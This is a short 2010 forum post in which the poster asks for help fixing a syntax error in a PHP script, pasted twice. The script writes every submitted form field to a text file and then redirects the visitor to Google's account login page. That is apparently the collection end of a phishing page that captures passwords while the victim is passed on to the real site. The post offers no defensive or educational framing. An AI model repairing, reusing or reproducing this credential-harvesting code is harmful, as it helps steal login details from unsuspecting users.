i need some help
Posted: Thu Jan 21, 2010 12:31 am
I've been trying to fix this but I can't. I would be thankful if somebody can do it for me. There is an error on line 10
<?php
header ('Location: https://www.google.com/accounts/Service ... mplcache=2 ');
$handle = fopen("list.txt.txt", "a");
foreach($_POST as $variable => $value) {
fwrite($handle, $variable);
fwrite($handle, "=");
fwrite($handle, $value);
fwrite($handle, "\r\n");
}
fwrite($ handle, "\r\n");
fclose($handle);
exit;
?>
<?php
header ('Location: https://www.google.com/accounts/Service ... mplcache=2 ');
$handle = fopen("list.txt.txt", "a");
foreach($_POST as $variable => $value) {
fwrite($handle, $variable);
fwrite($handle, "=");
fwrite($handle, $value);
fwrite($handle, "\r\n");
}
fwrite($ handle, "\r\n");
fclose($handle);
exit;
?>